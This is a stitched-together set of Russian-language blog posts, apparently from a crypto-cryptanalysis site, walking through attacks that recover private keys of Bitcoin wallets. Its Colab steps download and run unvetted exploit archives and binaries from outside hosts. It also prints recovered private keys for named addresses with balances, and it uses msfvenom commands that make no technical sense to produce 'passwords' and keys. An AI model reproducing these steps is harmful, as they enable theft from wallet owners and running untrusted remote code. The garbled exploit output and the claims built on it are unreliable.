bitcoin-22.1-win64-setup.exe 14-Dec-2022 18:01 18771672 bitcoin-22.1-win64.zip 14-Dec-2022 18:01 34263968 bitcoin-22.1-x86_64-linux-gnu.tar.gz 14-Dec-2022 18:01 35964880 bitcoin-22.1.tar.gz 14-Dec-2022 18:01 8122372 bitcoin-22.1.torrent 14-Dec-2022 18:01 49857 Установить Bitcoin Core version 22.1 ОБЯЗАТЕЛЬНО! Перезагрузите программу QT // Запустите обратно Bitcoin Core Нажимаем клавиши: Ctrl + Q Проверим через команду getaddressinfo Биткоин Кошелек: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b getaddressinfo "address" Return information about the given bitcoin address. Some of the information will only be present if the address is in the active wallet. Запустим команду: getaddressinfo 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b Результат: { "address": "1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b", "scriptPubKey": "76a9147774801e52a110aba2d65ecc58daf0cfec95a09f88ac", "ismine": true, "solvable": true, "desc": "pkh([7774801e]02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f)#qzqmjdel", "iswatchonly": false, "isscript": false, "iswitness": false, "pubkey": "02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f", "iscompressed": true, "ischange": false, "timestamp": 1, "labels": [ "" ] } Запустим команду dumpprivkey для получения приватного ключа к Биткоин Кошельку: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b dumpprivkey "address" Reveals the private key corresponding to 'address'. Then the importprivkey can be used with this output Запустим команду: dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b Результат: Error: Please enter the wallet passphrase with walletpassphrase first. (code -13) passphrase ?!?!? passphrase ?!?!? passphrase ?!?!? Запустим Padding Oracle Attack на Wallet.dat и расшифруем пароль в бинарный формат, для этого нам понадобится установить репозитории Bitcoin Core integration/staging tree для этого вы можете открыть готовый файл от Jupyter Notebook и загрузить в блокнот Google Colab ) https://colab.research.google.com/drive/1rBVTPyePTMjwXganiwkHfz59vcAtN5Wt https://github.com/demining/CryptoDeepTools/tree/main/27PaddingOracleAttackonWalletdat Padding_Oracle_Attack_on_Wallet_dat.ipynb Установим Ruby в Google Colab !sudo apt install ruby-full !ruby --version Версия ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux-gnu] !gem install bitcoin-ruby !gem install ecdsa !gem install base58 !gem install crypto !gem install config-hash -v 0.9.0 Установим Metasploit Framework и воспользуемся MSFVenom !git clone https://github.com/rapid7/metasploit-framework.git ls cd metasploit-framework/ ls Опции: !./msfvenom -help Установим Bitcoin Core integration/staging tree в Google Colab: !git clone https://github.com/bitcoin/bitcoin.git ls Перейдем по каталогу к файлу: aes.cpp для интеграции эксплойта для запуска Padding Oracle Attack на Wallet.dat cd bitcoin/src/crypto/ ls Откроем файл: aes.cpp через утилиту cat cat aes.cpp Для проведения атаки загрузим файл: wallet.dat в каталог: bitcoin/src/crypto/ !wget https://github.com/demining/CryptoDeepTools/raw/29bf95739c7b7464beaeb51803d4d2e1605ce954/27PaddingOracleAttackonWalletdat/wallet.dat ls Перейдем обратно к Metasploit Framework cd / cd content/metasploit-framework/ ls Откроем папки по каталогу: /modules/exploits/ ExploitDarlenePRO Загрузим "ExploitDarlenePRO" по каталогу: /modules/exploits/ cd modules/ ls cd exploits/ !wget https://darlene.pro/repository/fe9b4545d58e43c1704b0135383e5f124f36e40cb54d29112d8ae7babadae791/ExploitDarlenePRO.zip Разархивируем содержимое ExploitDarlenePRO.zip через утилиту unzip !unzip ExploitDarlenePRO.zip Перейдем по каталогу: /ExploitDarlenePRO/ ls cd ExploitDarlenePRO/ ls Для запуска эксплойта перейдем обратно к Metasploit Framework cd / cd content/metasploit-framework/ ls Нам необходимо определить наш LHOST (Local Host) наш IP-address атакующей виртуальной машины. Запустим команды: !ip addr !hostname -I Воспользуемся инструментом для создания полезной нагрузки MSFVenom Для эксплуатации выбираем Биткоин Кошелек: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b https://btc1.trezor.io/address/1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b Команда запуска: !./msfvenom 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o decode_core.rb -p bitcoin/src/crypto LHOST=172.28.0.12 -f CPP -o aes.cpp -p bitcoin/src/crypto LHOST=172.28.0.12 -f DAT -o wallet.dat Результат: 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 Полученный бинарный формат нам необходимо сохранить в файл: walletpassphrase.txt воспользуемся Python-скриптом. Команда: import hashlib Binary = "1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101" f = open("walletpassphrase.txt", 'w') f.write("walletpassphrase " + Binary + " 60" + "\n") f.write("" + "\n") f.close() Откроем файл: walletpassphrase.txt ls cat walletpassphrase.txt Результат: walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60 Пароль для доступа к приватному ключу найден! Команды: walletpassphrase 1111111001010001100010110100011010011111011101001010111001011110010111000011101101000101010100001111000000011110010001110001110001011000111101001101110010010010101001101011110100010010100011011011001010111100110100110011100100001110110101001110111011100101 60 dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz Приватный Ключ Получен! pip3 install bitcoin-utils Запустим код для проверки соответствие Биткоин Адреса: Private key WIF: KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz Public key: 02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f Address: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b Hash160: 7774801e52a110aba2d65ecc58daf0cfec95a09f -------------------------------------- The message to sign: CryptoDeepTech The signature is: ILPeG1ThZ0XUXz3iPvd0Q6ObUTF7SxmnhUK2q0ImEeepcZ00npIRqMWOLEfWSJTKd1g56CsRFa/xI/fRUQVi19Q= The signature is valid! Откроем bitaddress и проверим: ADDR: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b WIF: KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz HEX: 3A32D38E814198CC8DD20B49752615A835D67041C4EC94489A61365D9B6AD330 https://www.blockchain.com/en/explorer/addresses/btc/1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b BALANCE: $ 44502.42 References: [1] Practical Padding Oracle Attacks (Juliano Rizzo Thai Duong) [2010] [2] Efficient Padding Oracle Attacks on Cryptographic Hardware (Romain Bardou, Riccardo Focardi, Yusuke Kawamoto, Lorenzo Simionato, Graham Steel, Joe-Kai Tsay) [3] Security Flaws Induced by CBC Padding Applications to SSL, IPSEC, WTLS… (Serge Vaudenay) [4] Padding Oracle Attack on PKCS#1 v1.5: Can Non-standard Implementation Act as a Shelter (Si Gao, Hua Chen, and Limin Fan) [5] Attacks and Defenses (Dr. Falko Strenzke) [2020] [6] CBC padding oracle attacks [2023] [7] Fun with Padding Oracles (Justin Clarke) [OWASP London Chapter] [8] Practical Padding Oracle Attacks on RSA (Riccardo Focardi) [9] The Padding Oracle Attack (Fionn Fitzmaurice) [2018] [10] Exploiting CBC Padding Oracles Eli Sohl [2021] [11] Partitioning Oracle Attacks (Julia Len, Paul Grubbs, Thomas Ristenpart) [Cornell Tech] [12] Padding and CBC Mode (David Wagner and Bruce Schneider) [1997] [13] Padding Oracle Attacks (methodology) [14] Padding Oracle Attack (Introduction Packet Encryption Mode CTF Events) Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов. Исходный код Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/0aCfT-kCRlw Источник: https://cryptodeep.ru/padding-oracle-attack-on-wallet-dat Криптоанализ
  6. !git clone https://github.com/lnbits/lnbits.git ls Откроем уязвимый файл: quasar.umd.js через утилиту cat cat lnbits/lnbits/static/vendor/quasar.umd.js Откроем папки по каталогу: /modules/exploits/ ExploitDarlenePRO Загрузим "ExploitDarlenePRO" по каталогу: /modules/exploits/ cd modules/ ls cd exploits/ !wget https://darlene.pro/repository/21fa0f866f9f5fd22ce045e57f22185de1877dee25ad9d3974b7167a78957680/ExploitDarlenePRO.zip Разархивируем содержимое ExploitDarlenePRO.zip через утилиту unzip !unzip ExploitDarlenePRO.zip Перейдем по каталогу: /ExploitDarlenePRO/ ls cd ExploitDarlenePRO/ ls Для запуска эксплойта перейдем обратно к Metasploit Framework cd / cd content/metasploit-framework/ ls Нам необходимо определить наш LHOST (Local Host) наш IP-address атакующей виртуальной машины. Запустим команды: !ip addr !hostname -I Воспользуемся инструментом для создания полезной нагрузки MSFVenom Для эксплуатации выбираем Биткоин Кошелек: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F https://btc1.trezor.io/address/1qzgi39y33HrM7mHsZ6FaNspHCraJe62F Команда запуска: !./msfvenom 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o main.rb -p lnbits/lnbits/static/vendor LHOST=172.28.0.12 -f JS -o quasar.umd.js Результат: 111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011 Полученный бинарный формат нам необходимо сохранить в файл: binary.txt воспользуемся утилитой echo Команда: !echo '111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011' > binary.txt Конвертируем бинарный формат в HEX-формат для получение приватного ключа Биткоин Кошелька: Воспользуемся кодом: binaryFile = open("binary.txt", "r") binaryFile = binaryFile.readlines() hexFile = open("hex.txt", "w+") # loop through each line of binaryFile then convert and write to hexFile for line in binaryFile: binaryCode = line.replace(" ", "") hexCode = hex(int(binaryCode, 2)) hexCode = hexCode.replace("0x", "").upper().zfill(4) hexFile.write(hexCode + "\n") # close hexFile hexFile.close() Откроем файл: hex.txt cat hex.txt 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B Приватный Ключ Найден! Установим модуль Bitcoin !pip3 install bitcoin Запустим код для проверки соответствие Биткоин Адреса: from bitcoin import * with open("hex.txt","r") as f: content = f.readlines() # you may also want to remove whitespace characters like `\n` at the end of each line content = [x.strip() for x in content] f.close() outfile = open("privtoaddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем файл: privtoaddr.txt cat privtoaddr.txt Результат: 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B:1qzgi39y33HrM7mHsZ6FaNspHCraJe62F Откроем bitaddress и проверим: ADDR: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F WIF: L1TWHkT6HcNVHCjsUpGecyZQqGJC5Ek98HunmRH4c3zb8V87NUiP HEX: 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B https://www.blockchain.com/en/explorer/addresses/btc/1qzgi39y33HrM7mHsZ6FaNspHCraJe62F BALANCE: $ 11032.77 References: [1] A Cryptoeconomic Traffic Analysis of Bitcoins Lightning Network (Ferenc Beres, Istvan A. Seres, Andras A. Benczur) [2] Flood & Loot: A Systemic Attack On The Lightning Network (Jona Harris, Aviv Zohar) [3] Short Paper: A Centrality Analysis of the Lightning Network (Philipp Zabka, Klaus-T. Foerster, Christian Decker, Stefan Schmid) [4] Congestion Attacks in Payment Channel Networks (Ayelet Mizrahi, Aviv Zohar) [5] A Deep Dive Into Lightning as a Bitcoin Scaling Solution (George Kaloudis, Teddy Oosterbaan) [6] The Lightning Network is an overlay network powered by Bitcoin smart contracts it is NOT a blockchain (George Kaloudis, Teddy Oosterbaan) [7] Lightning Network Scalability Solutions (Joseph Poon, Thaddeus Dryja) [8] The Bitcoin Lightning Network DRAFT Version 0.5 (Joseph Poon, Thaddeus Dryja) [9] CoinPool efficient off-chain payment pools for Bitcoin (Gleb Naumenko, Antoine Riard) Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов. Исходный код Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/ZpflbzENAAw Источник: https://cryptodeep.ru/bitcoin-lightning-wallet-vulnerability Криптоанализ
  7. CRYPTO DEEP TECH В наших самых ранних работах мы опубликовали статью на тему “LATTICE ATTACK” как полноценное решение HNP [Hidden Number Problem], но с недавним появлением новой атаки “POLYNONCE ATTACK”, мы решили дополнить статью с использованием 79 signatures ECDSA. Исходя из прошлой статьи, где за полиному мы брали 128 bits и с фактическим увеличение количество подписей мы приблизим значение полиномы до 249 bits. За теоретическую основу мы будем брать материалы: “Lattice Attack on Bitcoin” https://attacksafe.ru/lattice-attack-on-bitcoin 19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z 6a941396b28a72ac834d922165995e6685a760f884dbb9e8b6dea95b01f0aae8 RawTX "hex": 010000000afa0765dc83c2e04b53a03ad9f5e7603f974c5a70e7a486bc957e72809facab7b2d0000006a4730440220746bd0443317a77c069bddae306dc658ec740bb1a6312bdcb4ce666bae42e988022066c34dd48f0e34ae4aefd28564f46fb7473d0b49d55adb716b9f04e663d0a9890121033ee89b98b1d6e71285314e1d1c753003a7a80c17f46146a91077006c76e25e7affffffff................................ Загрузим файл: LATTICE_ATTACK_249bits.ipynb Скачаем HEX-данные через утилиту wget и сохраним в файл: RawTX.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example1/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: !chmod +x attacksafe ls Применение: !./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode !./attacksafe -version Version 5.3.4. [ATTACKSAFE SOFTWARE, © 2023] Запустим список всех атак: !./attacksafe -list Выберем -tool: lattice_attack Запустим -tool lattice_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool lattice_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv Для того чтобы рассчитать приватный ключ к Биткоин Кошельку из файла SignatureRSZ.csv мы установим SageMath !wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 cd SageMath/ ls !python3 relocate-once.py !mv '/content/attacksafe' '/content/SageMath/attacksafe' !mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv' ls !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/crack_weak_ECDSA_nonces_with_LLL.py !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0x9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941 Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example1/POLYNONCE.py Результат: Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты. Значение POLYNONCE в формате HEX нам позволяет полноценно решить проблему скрытых чисел получить приватный ключ и восстановить Биткоин Кошелек. Проверим HEX приватного ключа: !pip3 install bitcoin from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() 9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941:19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z Откроем bitaddress и проверим: ADDR: 19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z WIF: L2PhDrYZw6fWqeLZMnMeAXvxZ47MEnepaQVLL2EazbRhqesytoQB HEX: 9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941 https://www.blockchain.com/en/explorer/addresses/btc/19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z BALANCE: $ 1015.58 Рассмотрим остальные примеры: №2 1GPZVDUyPM6qxCsJQrpJeo14WDRVLvTZ2Z 9130c5b8e92f37d3a58dcae16daa27625cc52b698a83af7c8b891f01bfa0b2af RawTX "hex": 0100000041e981df9d37a7af6f5ee77abade3ec58acbf864f942bdecb63ea2efa593e2c3391f0000006b4830450221009d8ceef05e2fa0a623811df57265a3678f902e81dc82c3862d12bbb07b90de18022036bbed961b4f8665eb3fb3047a1398a1aeae519a8e2a1a97de57863fc0cc4a380121029755a17bf76237cde9e05fc333a255b926d526a7763abe725a4f6253ebdae109ffffffff.............................. !rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example2/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Запустим -tool lattice_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool lattice_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0x00db251a1ab7cfa7679dfe61271d0af4bb9c68595178cf4c9237478eab2dba1d Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example2/POLYNONCE.py Результат: Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты. Значение POLYNONCE в формате HEX нам позволяет полноценно решить проблему скрытых чисел получить приватный ключ и восстановить Биткоин Кошелек. Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем bitaddress и проверим: ADDR: 1GPZVDUyPM6qxCsJQrpJeo14WDRVLvTZ2Z WIF: KwFNhRPDpgD5X77T8x5oL628aHh9UtscwwrLjGBKE8NeLshYvAqC HEX: 00db251a1ab7cfa7679dfe61271d0af4bb9c68595178cf4c9237478eab2dba1d https://www.blockchain.com/en/explorer/addresses/btc/1GPZVDUyPM6qxCsJQrpJeo14WDRVLvTZ2Z BALANCE: $ 999.10 Рассмотрим остальные примеры: №3 18Y9nUpdtxAKTh6yaN299jfUxcpJ2ApHz 0b21368bb6e6658adf4079b5ca6e7286c6e13471acef879168e7c17809476c76 RawTX "hex": 0100000041c7a8d97168ee154550f5e43b9074e5f357a4dc6b2350c96f75e377df0a39b9fa210000006b48304502210097d6b896929d77634b8d9430bc2842209cad42bb236c408e18470b9fd86b3d6a0220684ac14228c4adaa9df819e7fc8e82cf3c4242b74e27f5dd190d63231e8a058a012102990a280aef14e545b9b076b6548a4e886476d967e447bb69efcf0b725efda04effffffff.............................. !rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example3/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Запустим -tool lattice_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool lattice_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0x80e3052532356bc701189818c095fb8a7f035fd7a5a96777df4162205e945aa5 Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example3/POLYNONCE.py Результат: Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты. Значение POLYNONCE в формате HEX нам позволяет полноценно решить проблему скрытых чисел получить приватный ключ и восстановить Биткоин Кошелек. Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем bitaddress и проверим: ADDR: 18Y9nUpdtxAKTh6yaN299jfUxcpJ2ApHz WIF: L1YFTAP2X6jhi9W6ZVy2xX8H89TYwZcgSKcPLX7NmAx3n8PjqDkU HEX: 80e3052532356bc701189818c095fb8a7f035fd7a5a96777df4162205e945aa5 https://www.blockchain.com/en/explorer/addresses/btc/18Y9nUpdtxAKTh6yaN299jfUxcpJ2ApHz BALANCE: $ 1023.25 №4 12fqNTJc1wj2xfNscYHAzehD6f6sRjWBor 6e6d84bc92cd79fba2d1eee5fb47e393896d44f666a50d4948a022751e3f0989 RawTX "hex": 01000000418ff67c7d3309211ab9d9629d97bbac7730d3cbb419df4ec43d2c5fc4f81bbefb1b0000006b4830450221008c223861acf1f265547eddb04a7cf98d206643a05824e56e97c70beddd18eaf20220139a34bf077a1fdb15e716d765955203e746616dfe8bf536b86d259b5c8a09b8012103c50b5619a40a23ff6a5510238405b8efd3f8f1bc442e1a415b25078b4cbd88e3ffffffff.............................. !rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example4/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Запустим -tool lattice_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool lattice_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0x9e636a4ef1a63c4bd385b8d26d29f6394a29963f12109dbf34fef74377866a32 Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example4/POLYNONCE.py Результат: Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты. Значение POLYNONCE в формате HEX нам позволяет полноценно решить проблему скрытых чисел получить приватный ключ и восстановить Биткоин Кошелек. Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем bitaddress и проверим: ADDR: 12fqNTJc1wj2xfNscYHAzehD6f6sRjWBor WIF: L2Xbaxg8QFoLn5URp7GKMyLwEN9dV5TtgpdbXYo7WDJsHZLcT898 HEX: 9e636a4ef1a63c4bd385b8d26d29f6394a29963f12109dbf34fef74377866a32 https://www.blockchain.com/en/explorer/addresses/btc/12fqNTJc1wj2xfNscYHAzehD6f6sRjWBor BALANCE: $ 406.03 №5 1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN 8a00ad0cc10d768d6d2b407f99879e556e5fc2917b619cb9a551675b7682a791 RawTX "hex": "01000000fdf4014f7e4a72ecb9a3ed21a82a42b3127da87bdfee7c10779688dd8a38977cb80ece000000006a4730440220423f7cffadd494fb0148d509e67598b3c8d7f54695ee3830184adc2af234d5cf022005ebe83773bc81c7131fd0580350a998adde20fee6fd2d1da40a0191fea8242c0121027a2250a80a31965e928afff97d1c713e7ce70e6eb7c7491404a79991bfc6b5c1ffffffff........................... !rm HEX.txt !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example5/HEX.txt with open("HEX.txt") as myfile: listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile) f = open("RawTX.txt", 'w') f.write("" + listfile + "" + "\n") f.close() Запустим -tool lattice_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool lattice_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0xe2eadbde2e6a2adb6f81864cdf574dd44959717fe095486e2c0e55585594edf2 Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/21LatticeAttack/example5/POLYNONCE.py Результат: Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты. Значение POLYNONCE в формате HEX нам позволяет полноценно решить проблему скрытых чисел получить приватный ключ и восстановить Биткоин Кошелек. Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() e2eadbde2e6a2adb6f81864cdf574dd44959717fe095486e2c0e55585594edf2:1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN Откроем bitaddress и проверим: ADDR: 1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN WIF: L4porgUmuBkMbATA6Pp7r8uqShFt2zTPNEfuPNYi1BCym4hhV8gs HEX: e2eadbde2e6a2adb6f81864cdf574dd44959717fe095486e2c0e55585594edf2 https://www.blockchain.com/en/explorer/addresses/btc/1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN BALANCE: $ 995.39 Literature: Lattice Attacks against Elliptic-Curve Signatures with Blinded Scalar Multiplication Dahmun Goudarzi , Matthieu Rivain , and Damien Vergnaud CryptoExperts, Paris, France Biased Nonce Sense: Lattice Attacks against Weak ECDSA Signatures in Cryptocurrencies Joachim Breitner and Nadia Heninger DFINITY Foundation, Zug University of California, San Diego Return of the Hidden Number Problem A Widespread and Novel Key Extraction Attack on ECDSA and DSA Keegan Ryan Minerva: The curse of ECDSA nonces Systematic analysis of lattice attacks on noisy leakage of bit-length of ECDSA nonces Ján Jančár , Vladimír Sedláček , Petr Švenda and Marek Sýs Masaryk University, Ca’ Foscari University of Venice Estimating the Effectiveness of Lattice Attacks Kotaro Abe and Makoto Ikeda School of Engineering, The University of Tokyo, Tokyo, Japan Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/CzaHitewN-4 Источник: https://cryptodeep.ru/lattice-attack-249bits Криптоанализ
